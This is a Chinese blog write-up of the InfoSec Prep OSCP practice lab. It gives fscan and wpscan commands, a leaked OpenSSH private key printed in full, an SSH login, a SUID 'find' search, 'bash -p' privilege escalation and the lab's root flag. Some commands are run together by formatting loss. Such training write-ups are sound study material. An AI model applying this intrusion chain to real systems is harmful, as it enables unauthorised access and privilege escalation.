文章总结： 本文记录OSCP靶场实战全过程，通过端口扫描发现开放端口与WordPress框架，利用wpscan及robots.txt获取私钥。解码私钥后SSH登录靶机，最终利用bash的SUID权限成功提权并获取rootflag。文章详细演示了信息收集、Web渗透及权限提升技巧，适合渗透测试初学者学习参考。 综合评分： 72 文章分类： 渗透测试,实战经验,WEB安全

挑战INFOSEC PREP-OSCP靶场：破解渗透测试之路，直击OSCP考试实战！

原创

蜡笔小qian

黑客映像馆

2026年1月4日 16:18 湖北

在网络安全领域，渗透测试是一个重要的环节，它模拟黑客攻击的方式，帮助发现并修复系统中的潜在漏洞。本篇文章将带领大家通过一个OSCP靶场的渗透测试全过程，展示从信息收集到权限提升的技巧与方法。

1. 信息收集

首先，靶机的IP地址是已知的：192.168.1.5。我们需要对靶机进行端口扫描，以确定开放的端口。

使用fscan64.exe进行端口扫描：

fscan64.exe -h 192.168.1.5

扫描结果显示开放了80和22端口。于是，我们决定先访问80端口，尝试获取更多信息。

2. Web渗透

访问80端口后，页面内容给出了靶场的提示信息，明确告诉我们目标是获取/root目录中的flag，并且要通过机器人进行验证。靶机的唯一用户是oscp，显然这是一个OSCP专门赠送的靶场。

进一步观察，页面底部的footer信息表明该网站是基于WordPress框架构建的。接下来，我们利用这一信息进行Web渗透。

使用wpscan工具扫描WordPress的安全漏洞：

wpscan --url http://192.168.1.5

在扫描中，我们发现网站根目录下有一个robots.txt文件，里面列出了网站的敏感信息。打开robots.txt后，发现其中有个secret.txt

文件，我们访问该文件，得到了一串看似是Base64编码的字符串。

3. 私钥提取与解码

通过Base64解码，我们提取出了一个私钥，如下所示：

-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

接下来，我们将其保存为private文件，并赋予正确的权限：

chmod 600 private

然后，使用ssh命令尝试登录靶机：

ssh [email protected] -i private

登录过程中，我们遇到了一些加密问题。通过百度搜索发现，问题源于手动复制的私钥出现了问题。于是，我们通过wget重新下载secret.txt并使用base64 -d命令进行解码：

wget http://192.168.1.5/secret.txtbase64 -d secret.txt > privatechmod 600 private

再次使用私钥登录，成功进入了靶机。

4. 权限提升

成功登录后，我们通过sudo -l命令查看发现，当前用户oscp并没有特殊权限。但是，我们决定采用另一个思路进行权限提升，利用具有SUID权限的文件进行提权。

我们使用以下命令查找具有SUID权限的文件：

find / -user root -perm /4000 2>/dev/null

我们发现/usr/bin/bash具有SUID权限，意味着我们可以利用它提权。

执行命令：

bash -p

成功切换至root权限，访问/root目录并获取flag：

d73b04b0e696b0945283defa3eee4538

5.总结与反思

通过这次渗透测试，我们展示了从信息收集、Web渗透、私钥提取到权限提升的完整过程。每一步都离不开对系统的深入了解和对工具的熟练使用。通过这种实战训练，不仅增强了我们的安全意识，也提高了应对不同渗透场景的能力。

结语

渗透测试不仅仅是一个技术活，更是一项需要耐心和细致入微的任务。通过这种“攻防对抗”的方式，我们可以发现系统的弱点并加以修复，确保网络安全的稳固性。希望这篇文章能够为各位网络安全爱好者提供一些实战经验，也欢迎大家在留言区分享自己的看法和经验。

如果你也对渗透测试感兴趣，不妨尝试挑战这些靶场，积累更多的实战经验，提升自己的技术水平。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：黑客映像馆 蜡笔小qian《挑战INFOSEC PREP-OSCP靶场：破解渗透测试之路，直击OSCP考试实战！》